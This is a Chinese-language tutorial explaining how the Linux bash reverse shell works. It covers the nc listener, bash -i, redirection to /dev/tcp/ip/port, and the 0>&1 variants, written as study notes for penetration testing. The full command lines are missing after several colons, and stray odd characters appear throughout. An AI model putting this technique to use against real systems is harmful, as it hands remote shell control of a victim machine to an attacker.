之前在网上看到很多师傅们总结嘚linux反弹shell的一些方法为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义将研究的成果记录在这里,所謂的反弹shell指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器将被攻击者的shell反弹到我们的機器上,下面来介绍分析几种常用的方法
方法1: 反弹shell命令如下:
首先,使用nc在kali上监听端口:
可以看到shell成功反弹到了kali上面可以执行命令:
在解释这条反弹shell的命令原理之前,首先需要掌握几个点
linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:
还有就是>&这个符号的含義最好的理解是这样的:
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
也有师傅把&这个符号解释为是取地址符号学过C语言的小伙伴们都知道&这个符号代表取地址符,在C++中&符號还代表为引用这样做是为了区分文件描述符和文件,比如查看一个不存在的文件要把标准错误重定向到标准输出,如果直接cat notexistfile
2>1的话則会将1看作是一个文件,将标准错误输出输出到1这个文件里而不是标准输出,而&的作用就是为了区分文件和文件描述符:
理解了上面这些知識下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash然后就是/dev/tcp/ip/port,
/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调鼡建立一个socket连接,>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件也就是传递到远程上,如果远程开启了对应的端口去监听就会接收到这个bash的标准输出和标准错误输出,这个时候我们在本机CentOS输入命令输出以及错误输出的内容就会被传递显示到远程。
在本地输入设备(键盘)输入命令在本地看不到输入的内容,但是键盘输入的命令已经被输出到了远程然后命令的执行结果或者錯误也会被传到远程,查看远程可以看到标准输出和标准错误输出都重定向到了远程:
那么,0>&2也是可以的代表将标准输入重定向到标准错误输出,而标准错误输出重定向到了/dev/tcp/ip/port这个文件也就是远程,那么标准输入也就重定向到了远程
只是把输出输送到远程终端
后面多了0>&1囷0>&2表示将输入也送入终端。即想在centos虚拟机的输入要在kali中输入,显示结果也在kali中显示但是第一种的输入是在centos中输入。